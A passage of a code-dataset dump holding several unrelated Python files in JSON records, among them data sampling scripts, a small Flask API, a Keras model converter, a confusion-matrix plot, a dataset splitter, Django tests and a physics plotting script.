else:\n return 'incorrect output image'\n else:\n return 'application did not return EXIT_SUCCESS\\n' + err\n\n def test(test):\n cat, ex, case = test.split('.', 2)\n if ex == 'statistics_invalidinput':\n return test_statistics_invalidinput(case)\n elif ex == 'statistics':\n return test_statistics(case)\n elif ex == 'min_path':\n return test_min_path(case)\n else:\n assert ex == 'carve'\n return test_carve(case)\n\n for t in all_tests:\n print(\"running test %s\" % t)\n try:\n msg = test(t)\n if msg == None:\n print(\"PASS\")\n else:\n print(\"FAIL: %s\" % msg)\n except TimeoutError:\n print(\"FAIL: time out\")\n print()\n","sub_path":"run-tests.py","file_name":"run-tests.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"654334428","text":"\"\"\"\n\n\"\"\"\nimport json\nfrom collections import Counter\nimport numpy as np\n\n\ndef data_trans(input_path, output_path):\n ct = Counter()\n positive = []\n negative = []\n with open(input_path, \"r\", encoding=\"utf-8\") as f, open(output_path, \"w\", encoding=\"utf-8\") as f_o:\n for line in f.readlines():\n line = json.loads(line)\n cv_rt = line.get(\"cv_rt\")\n jd_rt = line.get(\"jd_rt\")\n cv_rt_v = list(cv_rt.values())\n jd_rt_v = list(jd_rt.values())\n ct[str(line.get(\"label\"))] += 1\n tmp = \"\\t\".join([\"##\".join(x) for x in cv_rt_v]) + \"@\" + \"\\t\".join(\n [\"##\".join(x) for x in jd_rt_v]) + \"@\" + str(line.get(\"label\"))\n if str(line.get(\"label\")) == \"1\":\n positive.append(tmp)\n elif str(line.get(\"label\")) == \"0\":\n negative.append(tmp)\n sample_total = positive + list(np.random.choice(negative, len(positive) * 5, replace=False))\n np.random.shuffle(sample_total)\n for neg_sample in sample_total:\n f_o.write(neg_sample + \"\\n\")\n print(ct.items())\n\n\ndef gen_vocab(input_path, output_path):\n with open(input_path, \"r\", encoding=\"utf-8\") as f, open(output_path, \"w\", encoding=\"utf-8\") as f_o:\n x, y = f.readline().strip(\"\\n\").split(\" \")\n print(x, y)\n f_o.write(\"UNK\" + \"\\n\")\n for line in f.readlines():\n line = line.strip(\"\\n\").split(\" \")\n f_o.write(line[0] + \"\\n\")\n\n\ndef filter_embedding_nocompany(input_path, output_path):\n embedding = []\n with open(input_path, \"r\", encoding=\"utf-8\") as f, open(output_path, \"w\", encoding=\"utf-8\") as f_o:\n x, y = f.readline().strip(\"\\n\").split(\" \")\n print(x, y)\n for line in f.readlines():\n _line = line.strip(\"\\n\").split(\" \")\n name_type = _line[0].split(\"|$|\")[0]\n if name_type != \"company\":\n embedding.append(line)\n f_o.write(\" \".join([str(len(embedding)), str(y)]) + \"\\n\")\n for item in embedding:\n f_o.write(item)\n\n\ndef sample(input_path, output_path, pos_num, neg_num):\n ct = Counter()\n positive = []\n negative = []\n with open(input_path, \"r\", encoding=\"utf-8\") as f, open(output_path, \"w\", encoding=\"utf-8\") as f_o:\n for line in f.readlines():\n line = json.loads(line)\n uuid_key = line.get(\"uuid_key\")\n cv_rt = line.get(\"cv_rt\")\n jd_rt = line.get(\"jd_rt\")\n cv_rt_v = list(cv_rt.values())\n jd_rt_v = list(jd_rt.values())\n ct[str(line.get(\"label\"))] += 1\n tmp = \"\\t\".join([\"##\".join(x) for x in cv_rt_v]) + \"@\" + \"\\t\".join(\n [\"##\".join(x) for x in jd_rt_v]) + \"@\" + str(line.get(\"label\")) + \"@\" + uuid_key\n if str(line.get(\"label\")) == \"1\":\n positive.append(tmp)\n elif str(line.get(\"label\")) == \"0\":\n negative.append(tmp)\n sample_total = list(np.random.choice(positive, pos_num, replace=False)) + list(np.random.choice(negative, neg_num, replace=False))\n np.random.shuffle(sample_total)\n for _sample in sample_total:\n f_o.write(_sample + \"\\n\")\n print(ct.items())\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n\n subparsers = parser.add_subparsers(dest='command')\n\n data_trans_parser = subparsers.add_parser('data_trans')\n data_trans_parser.add_argument('--input_path', required=True)\n data_trans_parser.add_argument('--output_path', required=True)\n\n gen_vocab_parser = subparsers.add_parser('gen_vocab')\n gen_vocab_parser.add_argument('--input_path', required=True)\n gen_vocab_parser.add_argument('--output_path', required=True)\n\n filter_embedding_parser = subparsers.add_parser('filter_embedding')\n 
filter_embedding_parser.add_argument('--input_path', required=True)\n filter_embedding_parser.add_argument('--output_path', required=True)\n\n data_predict_parser = subparsers.add_parser('sample')\n data_predict_parser.add_argument('--input_path', required=True)\n data_predict_parser.add_argument('--output_path', required=True)\n data_predict_parser.add_argument('--pos_num', required=True, type=int)\n data_predict_parser.add_argument('--neg_num', required=True, type=int)\n\n args = parser.parse_args()\n\n if args.command == 'data_trans':\n data_trans(args.input_path, args.output_path)\n elif args.command == 'gen_vocab':\n gen_vocab(args.input_path, args.output_path)\n elif args.command == 'filter_embedding':\n filter_embedding_nocompany(args.input_path, args.output_path)\n elif args.command == 'sample':\n sample(args.input_path, args.output_path, args.pos_num, args.neg_num)\n","sub_path":"data/data_trans.py","file_name":"data_trans.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"434109520","text":"from flask import Flask , request , render_template , send_file\nfrom tinydb import Query , TinyDB\nimport io,json\nimport pic_email as wc\n\napp = Flask(__name__)\n# 0:KEY is not right\n# 1:KEY is right\n# 2: Make Image& Send email sucess\n# 3: Have been used\n# 4:\n# 5:Send wrong\ndef return_msg(message):\n if type(message) is dict:\n message = json.encodes(message)\n return message\n\ndef confirm_key (key): #finish\n db = TinyDB(\"data.json\")\n People = Query()\n res = db.search(People.key == key)\n if len(res) != 0:\n return res[0]\n else:\n return False\n\n\ndef confirm_use(key):#确定一下Key有没有被用过\n db = TinyDB(\"data.json\")\n People = Query()\n res = db.search(People.key == key)\n if res[0][\"use\"] == 0:\n return True\n else:\n return False\n\n@app.route('/key',methods = ['post'])\ndef key():\n message=json.loads(request.get_data(as_text=True))\n person_info = confirm_key(message['key'])\n if person_info:\n return_json = {'code': 0, 'data': person_info,\n 'message': 'success'}\n else:\n return_json = {'code': 0, 'data':'',\n 'message': 'user not in server'}\n return return_msg(person_info)\n\n\n@app.route('/send',methods = ['POST'])\ndef send_email():\n message = json.loads(request.get_data(as_text = True))\n email = message['email']\n name = message['name']\n key = message['key']\n if not confirm_key(key): # 没有每个人唯一的Key\n return \"0\" \n if confirm_use(key): # 先确定下是不是志愿者列表中的key 并且是否注册过 没问题的话开始做图片\n try:\n wc.write_to_pic(name,email)\n return return_msg(\"2\")\n except : #发送邮件或者创建图片错误 可能是邮件有问题\n return return_msg(\"5\")\n else:\n return return_msg(\"3\") # Key被用过了\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"API/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"14343003","text":"class Solution:\n def multiply(self, num1: str, num2: str) -> str:\n if num1 == '0' or num2 == '0' : return \"0\"\n l1 = list(map(int,list(num1))) # 用列表储存num1的每一数位\n l2 = list(map(int,list(num2))) # 用列表储存num2的每一数位\n \n carry2 = 1 # 帮助 num2 中乘数的进位 \n res = 0\n \n # 累加 乘数的每一位与被乘数相乘得到的结果\n while l2: \n carry1 = 1 # 帮助 num1 中被乘数的进位 \n tmp = 0 # 储存在未进位时,乘数的每一位与被乘数相乘得到的结果\n factor2 = l2.pop()\n # 将被乘数的每一位与乘数的当前位相乘,得到的结果累加,并存入tmp\n for i in range(len(l1)-1,-1,-1):\n print(i)\n tmp += l1[i]*factor2*carry1\n carry1 *= 10 # 被乘数进位\n \n res += tmp * carry2\n carry2 *= 10 # 乘数进位\n return str(res)","sub_path":"array/43.py","file_name":"43.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"598064698","text":"\nimport tensorflow as tf\nfrom tensorflow.python.keras.models import load_model\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.framework.graph_util import convert_variables_to_constants\nimport numpy as np\nimport json\n\ndef freeze_session(sess, keep_var_names=None, output_names=None, clear_devices=True):\n graph = sess.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = ''\n frozen_graph = convert_variables_to_constants(sess, input_graph_def, output_names, freeze_var_names)\n return frozen_graph\n\ndef convert_keras_to_tensorflow(keras_model_filename, tf_model_filename):\n model = load_model(keras_model_filename)\n model.summary()\n frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs])\n tf.train.write_graph(frozen_graph, './', tf_model_filename, as_text=False)\n tf.train.write_graph(frozen_graph, './', tf_model_filename + '.txt', as_text=True)\n\nif __name__ == '__main__':\n # convert\n keras_model_filename = './model.h5'\n tf_model_filename = './frozen_graph.pb'\n convert_keras_to_tensorflow(keras_model_filename, tf_model_filename)\n","sub_path":"keras_to_tensorflow.py","file_name":"keras_to_tensorflow.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"498782887","text":"#!/usr/bin/env python3\n\nfrom GMPi_Pack import Sense\nfrom GMPi_Pack import ReadConfig\nfrom GMPi_Pack import LightAlert, ReadConfig\nimport datetime\n\nconfig = ReadConfig()\nwhichDHT = int(config[\"which_dht\"]) # default 22\nwhichDataPin = int(config[\"which_data_pin\"]) # default 4. What is the data pin?\nfilepath = config[\"output_path\"]\nsethour = datetime.datetime.now().strftime(\"%H\") #hour of day\nhour = int(sethour)\ncurrentLight = Sense(filepath, whichDHT, whichDataPin)\n\nif hour >= 12 or hour <= 20:\n maxLight = float(config[\"maximum_light_threshold\"])\n minLight = float(config[\"minimum_light_threshold\"])\n\n#for debugging\n #print(currentLight)\n #print(maxLight)\n #print(minLight)\n\n if (currentLight < minLight or currentLight > maxLight):\n LightAlert(config[\"email_sender\"], config[\"email_receiver\"])\n #print('Email Alert Sent!')\n","sub_path":"sense.py","file_name":"sense.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"378981521","text":"from copy import deepcopy\nfrom itertools import product\nfrom typing import List\n\nfrom aocd import get_data\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\ndef update(x: int, y: int, layout: List[str]):\n curr = layout[y][x]\n pos_y = [n + y for n in (-1, 0, 1) if 0 <= n + y < len(layout)]\n pos_x = [n + x for n in (-1, 0, 1) if 0 <= n + x < len(layout[0])]\n adjs = [(adj[0], adj[1]) for adj in product(pos_y, pos_x) if adj != (y, x)]\n\n if curr == \"L\":\n if all([layout[ny][nx] != \"#\" for ny, nx in adjs]):\n return \"#\"\n elif curr == \"#\":\n if [layout[ny][nx] == \"#\" for ny, nx in adjs].count(True) >= 4:\n return \"L\"\n return curr\n\n\ndef update2(x: int, y: int, layout: List[str]):\n adjs = []\n curr = layout[y][x]\n for yd in (-1, 0, 1):\n for xd in (-1, 0, 1):\n if yd == 0 and xd == 0:\n continue\n n = 1\n while True:\n if not (\n 0 <= y + yd * n < len(layout) and 0 <= x + xd * n < len(layout[0])\n ):\n break\n if y + yd * n >= len(layout) or x + xd * n >= len(layout[0]):\n break\n if layout[y + yd * n][x + xd * n] != \".\":\n adjs.append((y + yd * n, x + xd * n))\n break\n n += 1\n if curr == \"L\":\n if all([layout[ny][nx] != \"#\" for ny, nx in adjs]):\n return \"#\"\n elif curr == \"#\":\n if [layout[ny][nx] == \"#\" for ny, nx in adjs].count(True) >= 5:\n return \"L\"\n return curr\n\n\ndef get_occupied(layout, method):\n current = deepcopy(layout)\n next = [[\"\" for _ in range(len(layout[0]))] for _ in range(len(layout))]\n while True:\n for y, row in enumerate(current, 0):\n for x, seat in enumerate(row, 0):\n if seat == \".\":\n next[y][x] = \".\"\n else:\n if method == 1:\n next[y][x] = update(x, y, current)\n else:\n next[y][x] = update2(x, y, current)\n if current == next:\n break\n current = deepcopy(next)\n\n occupied = sum([row.count(\"#\") for row in current])\n\n print(occupied)\n\n\nif __name__ == \"__main__\":\n data = get_data(day=11, year=2020)\n get_occupied(data.splitlines(), 1)\n get_occupied(data.splitlines(), 2)","sub_path":"adventofcode/day11/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"416108598","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 20 09:50:40 2019\r\n\r\n@author: Gyanendra\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn import tree\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.utils.multiclass import unique_labels\r\n\r\n# import some data to play with\r\ndata=pd.read_csv('T3resin1.txt')\r\ndata=pd.DataFrame(data)\r\n\r\nX=data.iloc[:,2:4].values\r\n#X=pd.DataFrame(data.iloc[:,3:4])\r\nY=data.iloc[:,:1].values\r\n#Y=pd.DataFrame(data.iloc[:,:1])\r\nclass_names = np.arange(0,2,dtype=np.int)\r\nprint(class_names)\r\n\r\n# Split the data into a training set and a test set\r\n#X_train, X_test, y_train, y_test, = train_test_split(X, y, random_state=1)\r\nnumber_of_samples = len(Y)\r\n\r\n#Splitting into training, validation and test sets\r\nrandom_indices = np.random.permutation(number_of_samples)\r\n#Training set\r\nnum_training_samples = int(number_of_samples*0.7)\r\nx_train = X[random_indices[:num_training_samples]]\r\ny_train = Y[random_indices[:num_training_samples]]\r\n#Validation set\r\nnum_validation_samples = int(number_of_samples*0.15)\r\nx_val = X[random_indices[num_training_samples : num_training_samples+num_validation_samples]]\r\ny_val = Y[random_indices[num_training_samples: num_training_samples+num_validation_samples]]\r\n#Test set\r\nnum_test_samples = int(number_of_samples*0.15)\r\nx_test = X[random_indices[-num_test_samples:]]\r\ny_test = Y[random_indices[-num_test_samples:]]\r\n\r\n#Visualizing the training data\r\nX_class0 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i]==0]) #Picking only the first two classes\r\nY_class0 = np.zeros((X_class0.shape[0]),dtype=np.int)\r\nX_class1 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i]==1])\r\nY_class1 = np.ones((X_class1.shape[0]),dtype=np.int)\r\n\r\n\r\n# Run classifier, using a model that is too regularized (C too low) to see\r\n# the impact on the results\r\nclassifier = tree.DecisionTreeClassifier()\r\n#classifier = svm.SVC(kernel='linear', C=0.01)\r\ny_pred = classifier.fit(x_train, y_train).predict(x_test)\r\n\r\n\r\n\r\ndef plot_confusion_matrix(y_true, y_pred, classes,\r\n normalize=False,\r\n title=None,\r\n cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n if not title:\r\n if normalize:\r\n title = 'Normalized confusion matrix'\r\n else:\r\n title = 'Confusion matrix, without normalization'\r\n\r\n # Compute confusion matrix\r\n cm = confusion_matrix(y_true, y_pred)\r\n # Only use the labels that appear in the data\r\n classes = classes[unique_labels(y_true, y_pred)]\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n print(\"Normalized confusion matrix\")\r\n else:\r\n print('Confusion matrix, without normalization')\r\n\r\n print(cm)\r\n\r\n fig, ax = plt.subplots()\r\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\r\n ax.figure.colorbar(im, ax=ax)\r\n # We want to show all ticks...\r\n ax.set(xticks=np.arange(cm.shape[1]),\r\n yticks=np.arange(cm.shape[0]),\r\n # ... 
and label them with the respective list entries\r\n xticklabels=classes, yticklabels=classes,\r\n title=title,\r\n ylabel='True label',\r\n xlabel='Predicted label')\r\n\r\n # Rotate the tick labels and set their alignment.\r\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\r\n rotation_mode=\"anchor\")\r\n\r\n # Loop over data dimensions and create text annotations.\r\n fmt = '.2f' if normalize else 'd'\r\n thresh = cm.max() / 2.\r\n for i in range(cm.shape[0]):\r\n for j in range(cm.shape[1]):\r\n ax.text(j, i, format(cm[i, j], fmt),\r\n ha=\"center\", va=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n fig.tight_layout()\r\n return ax\r\n\r\n\r\nnp.set_printoptions(precision=2)\r\n\r\n# Plot non-normalized confusion matrix\r\nplot_confusion_matrix(y_test, y_pred, classes=class_names,\r\n title='Confusion matrix, without normalization')\r\n\r\n# Plot normalized confusion matrix\r\nplot_confusion_matrix(y_test, y_pred, classes=class_names, normalize=True,\r\n title='Normalized confusion matrix')\r\n\r\nplt.show()","sub_path":"ConfusionMatrixforDTpy.py","file_name":"ConfusionMatrixforDTpy.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"352113466","text":"import pandas as pd\nimport os\nimport shutil\nimport random\n\n# --setting path of source dataset1 (covid-19 positive)--\ndata_path1 = \"source_datasets/covidgit/images\"\n# --reading metedata excel file inorder to extract covid positive data from source dataset--\ndataset = pd.read_csv(os.path.join(\"source_datasets/covidgit\", \"metadata.csv\"))\n# --setting destination directory for covid-19 positive data--\ntarget_dir = \"sourcedata/Covid19 Positive\"\n\n# --copying covid-19 positive images from source directory to destination directory--\ncnt = 0\nfor (i, raw) in dataset.iterrows():\n if raw['finding'] == 'Pneumonia/Viral/COVID-19' or raw['finding'] == 'Pneumonia/Viral/SARS':\n file_name = raw['filename']\n try:\n image_path = os.path.join(data_path1, file_name)\n image_copy_path = os.path.join(target_dir, file_name)\n shutil.copy2(image_path, image_copy_path)\n cnt += 1\n except Exception as e:\n i+=1\n\n# --printing total number of covid-19 positive images--\nprint(\"Total number of COVID-19 positive images\", cnt)\n\n\n# --reading metedata excel file inorder to extract covid negative data from source dataset--\nfile_path = \"Chest_xray_Corona_Metadata.csv\"\ndataset = pd.read_csv(file_path)\n# --setting path of source dataset2 (covid19 negative)--\nimages_path1 = \"source_datasets/kaggle_coronahack/train\"\nimages_path2 = \"source_datasets/kaggle_coronahack/test\"\n# --setting destination directory for covid-19 negative data--\ntarget_dir = \"sourcedata/Covid19 Negative\"\n# --copying covid-19 negative images from source directory to destination directory--\ncnt = 0\ni=0\nfor (i, raw) in dataset.iterrows():\n if raw['Label'] == \"Normal\":\n file_name = raw[\"X_ray_image_name\"]\n try:\n if raw[\"Dataset_type\"] == \"TRAIN\":\n image_path = os.path.join(images_path1, file_name)\n image_copy_path = os.path.join(target_dir, file_name)\n shutil.copy2(image_path, image_copy_path)\n elif raw[\"Dataset_type\"] == \"TEST\":\n image_path = os.path.join(images_path2, file_name)\n image_copy_path = os.path.join(target_dir, file_name)\n shutil.copy2(image_path, image_copy_path)\n cnt += 1\n except Exception as e:\n i+=1\n\n# --printing total number of covid-19 negative images--\nprint(\"Total number of COVID-19 negative images\", cnt)\n\n# --splitting covid positive images to 3 categories - train, valid, test--\nsource_dir = \"sourcedata/Covid19 Positive\"\ndestination_dir1 = \"dataset/train/Covid19 Positive\"\ndestination_dir2 = \"dataset/valid/Covid19 Positive\"\ndestination_dir3 = \"dataset/test/Covid19 Positive\"\n\nimage_names1 = os.listdir(source_dir)\nrandom.shuffle(image_names1)\nfor i in range(579):\n image_name = image_names1[i]\n image_path = os.path.join(source_dir, image_name)\n if i < 510:\n target_path = os.path.join(destination_dir1, image_name)\n shutil.copy2(image_path, target_path)\n elif i < 567:\n target_path = os.path.join(destination_dir2, image_name)\n shutil.copy2(image_path, target_path)\n else:\n target_path = os.path.join(destination_dir3, image_name)\n shutil.copy2(image_path, target_path)\n\nprint(\"The covid-19 positive images are splitted into train, valid and test sets\")\n# --splitting covid negative images to 3 categories - train, valid, test--\nsource_dir = \"sourcedata/Covid19 Negative\"\ndestination_dir1 = \"dataset/train/Covid19 Negative\"\ndestination_dir2 = \"dataset/valid/Covid19 Negative\"\ndestination_dir3 = \"dataset/test/Covid19 Negative\"\n\nimage_names1 = os.listdir(source_dir)\nrandom.shuffle(image_names1)\nfor i 
in range(1576):\n image_name = image_names1[i]\n image_path = os.path.join(source_dir, image_name)\n if i < 1410:\n target_path = os.path.join(destination_dir1, image_name)\n shutil.copy2(image_path, target_path)\n elif i < 1567:\n target_path = os.path.join(destination_dir2, image_name)\n shutil.copy2(image_path, target_path)\n else:\n target_path = os.path.join(destination_dir3, image_name)\n shutil.copy2(image_path, target_path)\nprint(\"The covid-19 negative images are splitted into train, valid and test sets\")","sub_path":"Creating_dataset.py","file_name":"Creating_dataset.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"401024926","text":"from django.urls import reverse\n\nfrom tool.context_processors import categories, select_parent_template, user_profile\nfrom tool.models import Profile\nfrom tool.tests import BaseTestCase\n\n\nclass ToolContextProcessorTest(BaseTestCase):\n def test_context_processor_categories(self):\n result = categories()\n self.assertEqual(\n result,\n {\n \"tools\": [\n {\"name\": \"Canvas\", \"slug\": \"canvas\"},\n {\"name\": \"Dota draft\", \"slug\": \"dota-draft\"},\n {\"name\": \"Exif info\", \"slug\": \"exif-info\"},\n {\"name\": \"Image to base64\", \"slug\": \"image-to-base64\"},\n {\"name\": \"Text manipulation\", \"slug\": \"text-manipulation\"},\n {\"name\": \"Units converter\", \"slug\": \"units-converter\"},\n ]\n },\n )\n\n def test_context_processor_select_parent_template(self):\n resp = self.client.get(reverse(\"main\"))\n request = resp.wsgi_request\n result = select_parent_template(request)\n self.assertEqual(result, {\"parent_template\": \"base.html\"})\n\n # Ajax request.\n resp = self.client.get(reverse(\"main\"), HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\")\n request = resp.wsgi_request\n result = select_parent_template(request)\n self.assertEqual(result, {\"parent_template\": \"dummy_parent.html\"})\n\n def test_context_processor_user_profile(self):\n # Anonymous user.\n resp = self.client.get(reverse(\"main\"))\n request = resp.wsgi_request\n result = user_profile(request)\n self.assertEqual(result, {\"profile\": None})\n\n # Registered user.\n self.client.login(username=\"testuser\", password=self.password)\n resp = self.client.get(reverse(\"main\"))\n request = resp.wsgi_request\n result = user_profile(request)\n profile, created = Profile.objects.get_or_create(user=self.test_user)\n self.assertEqual(created, False)\n self.assertEqual(result, {\"profile\": profile})\n","sub_path":"tool/tests/tests_context_processor.py","file_name":"tests_context_processor.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"353571892","text":"import sdf\nimport matplotlib\nmatplotlib.use('agg')\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\n#from numpy import ma\nfrom matplotlib import colors, ticker, cm\nfrom matplotlib.mlab import bivariate_normal\nfrom optparse import OptionParser\nimport os\n\n\n######## Constant defined here ########\npi = 3.1415926535897932384626\nq0 = 1.602176565e-19 # C\nm0 = 9.10938291e-31 # kg\nv0 = 2.99792458e8 # m/s^2\nkb = 1.3806488e-23 # J/K\nmu0 = 4.0e-7*pi # N/A^2\nepsilon0 = 8.8541878176203899e-12 # F/m\nh_planck = 6.62606957e-34 # J s\nwavelength= 1.0e-6\nfrequency = v0*2*pi/wavelength\n\nexunit = m0*v0*frequency/q0\nbxunit = m0*frequency/q0\ndenunit = frequency**2*epsilon0*m0/q0**2\nprint('electric field unit: '+str(exunit))\nprint('magnetic field unit: '+str(bxunit))\nprint('density unit nc: '+str(denunit))\n\nfont = {'family' : 'monospace', \n 'style' : 'normal',\n 'color' : 'black', \n\t 'weight' : 'normal', \n 'size' : 20, \n } \n######### Parameter you should set ###########\nstart = 1 # start time\nstop = 49 # end time\nstep = 1 # the interval or step\n\nn=12\n\npx = np.loadtxt('./txt/px_'+str(n).zfill(4)+'sdf.txt')\npy = np.loadtxt('./txt/py_'+str(n).zfill(4)+'sdf.txt')\ngrid_x = np.loadtxt('./txt/grid_x_'+str(n).zfill(4)+'sdf.txt')\ngrid_y = np.loadtxt('./txt/grid_y_'+str(n).zfill(4)+'sdf.txt')\nwork_x = np.loadtxt('./txt/work_x_'+str(n).zfill(4)+'sdf.txt')\nwork_y = np.loadtxt('./txt/work_y_'+str(n).zfill(4)+'sdf.txt')\n\ndata = sdf.read(\"./Data/\"+str(n).zfill(4)+\".sdf\",dict=True)\nwork_x = data['Particles/Time_Integrated_Work_x/subset_high_e/electron'].data\nwork_y = data['Particles/Time_Integrated_Work_y/subset_high_e/electron'].data\n\n#choice = np.random.choice(range(px.size), 10000, replace=False)\ngamma = work_x+work_y+1\n\n\nvalue_axisx = np.linspace(7,700,50)\nvalue_axisy = np.linspace(7,700,50)\nvalue_grid = np.linspace(0,700,51)\n\nvalue_total_x = np.zeros_like(value_axisy)\nvalue_total_y = np.zeros_like(value_axisy)\nvalue_num = np.zeros_like(value_axisy)\n\nfor i in range(50):\n value_total_x[i] = np.sum(work_x[(value_grid[i]<=gamma) & (value_grid[i+1]>gamma)],0)\n value_total_y[i] = np.sum(work_y[(value_grid[i]<=gamma) & (value_grid[i+1]>gamma)],0)\n value_num[i] = np.size(work_y[(value_grid[i]<=gamma) & (value_grid[i+1]>gamma)])\n print('x-:',value_total_x[i]/(value_total_x[i]+value_total_y[i]),'; y-:',value_total_y[i]/(value_total_x[i]+value_total_y[i]))\n\n# plt.subplot()\ny_x = value_total_x/(value_total_x+value_total_y)\ny_x[y_x > 1] = 1\ny_y = 1-y_x\nwidth=10\npl=plt.bar(value_axisx, y_x*value_axisy, width, color='orangered',edgecolor='black',linewidth=2)\npt=plt.bar(value_axisx, y_y*value_axisy, width, bottom=y_x*value_axisy, color='dodgerblue',edgecolor='black',linewidth=2)\n\nplt.xlim(-10,710)\nplt.ylim(0,710)\nplt.xlabel('$\\epsilon_e$ [m$_e$c$^2$]',fontdict=font)\nplt.ylabel('Work$_{x(y)}$ [m$_e$c$^2$]',fontdict=font)\nplt.xticks(fontsize=20); plt.yticks(fontsize=20);\nplt.legend(['Work$_x$','Work$_y$'],loc='best',fontsize=18)\n#plt.text(200,650,' t=400fs',fontdict=font)\n\n#plt.show()\n#lt.figure(figsize=(100,100))\nfig = plt.gcf()\nfig.set_size_inches(10.2, 8.4)\nfig.savefig('./figure_wrap_up/work_l_t_new'+str(n).zfill(4)+'.png',format='png',dpi=160)\n#plt.close(\"all\")\n\nprint('finised 
'+str(round(100.0*(n-start+step)/(stop-start+step),4))+'%')\n","sub_path":"wrap_energy_work_ratio.py","file_name":"wrap_energy_work_ratio.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"584144757","text":"from units import *\n\n\nprint(\"\\n| ConvIT 1.0 |\\n\\n-- Unit Categories --\")\n\nindex = 1\n# lists out the various category options available\nfor category in UnitMeasures.keys():\n print(str(index) + \".\", category)\n index += 1\n# plus a BMI calculator\nprint(\"\\n-- Bonus --\\n5. BMI Calculator\\n\")\n\ncategory_choice = input(\"Select a category: \").capitalize() # receives input\n# for selection of a\n# category\n\n\nclass Converter:\n # handler of conversions for all units from all categories except the\n # BMI calculator\n def __init__(self, val, con_from, con_to):\n self.value = int(val)\n self.convert_from = con_from\n self.convert_to = con_to\n\n @staticmethod\n def units_listing():\n # lists out the various unit options in the selected category\n print(\"\\n-- {} Units --\".format(category_choice))\n for unit in UnitMeasures[category_choice].keys():\n print(unit)\n\n def convert(self):\n new_value = round(self.value * UnitMeasures[category_choice][self.convert_from][self.convert_to], 3)\n unit_from = SI_unit[category_choice][self.convert_from.lower()]\n unit_to = SI_unit[category_choice][self.convert_to.lower()]\n\n print(\"{}{} = {}{}\".format(self.value, unit_from, new_value, unit_to))\n\n\nif category_choice == \"BMI\".capitalize():\n BMI()\nelse:\n Converter.units_listing()\n\n value = input(\"\\nEnter value: \") # receives value to convert with\n convert_from = input(\"From: \").capitalize() # receives unit to convert from\n # as per selected category\n\n convert_to = input(\"To: \").lower() # receives unit to convert to as per\n # selected category\n\n # executes the conversion functionality and prints out the result\n Converter(value, convert_from, convert_to).convert()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"457600968","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom onmt.utils.logging import init_logger\nfrom onmt.utils.misc import split_corpus\n\nimport onmt.opts as opts\nfrom onmt.utils.parse import ArgumentParser\n\nfrom onmt.dynamicdata.config import read_data_config, verify_shard_config\nfrom onmt.dynamicdata.transforms import set_train_opts\nfrom onmt.dynamicdata.vocab import load_fields, load_transforms\nfrom onmt.dynamicdata.iterators import yield_debug\n\n\ndef _get_parser():\n parser = ArgumentParser(description='debug_dynamicdata.py')\n\n parser.add('-config', '--config', required=False,\n is_config_file_arg=True, help='config file path')\n parser.add('--data_config', '-data_config',\n help='Path to data config yaml file. '\n 'Turns on dynamic data loader.')\n parser.add('--transforms_from_task',\n help='Apply the same transforms as for the specified '\n 'training task.')\n parser.add('--data_type', '-data_type', default=\"text\",\n help=\"Type of the source input. Options: [text|img].\")\n parser.add('--src', '-src', default=None, help=\"Source input file\")\n parser.add('--tgt', '-tgt', default=None, help=\"Target input 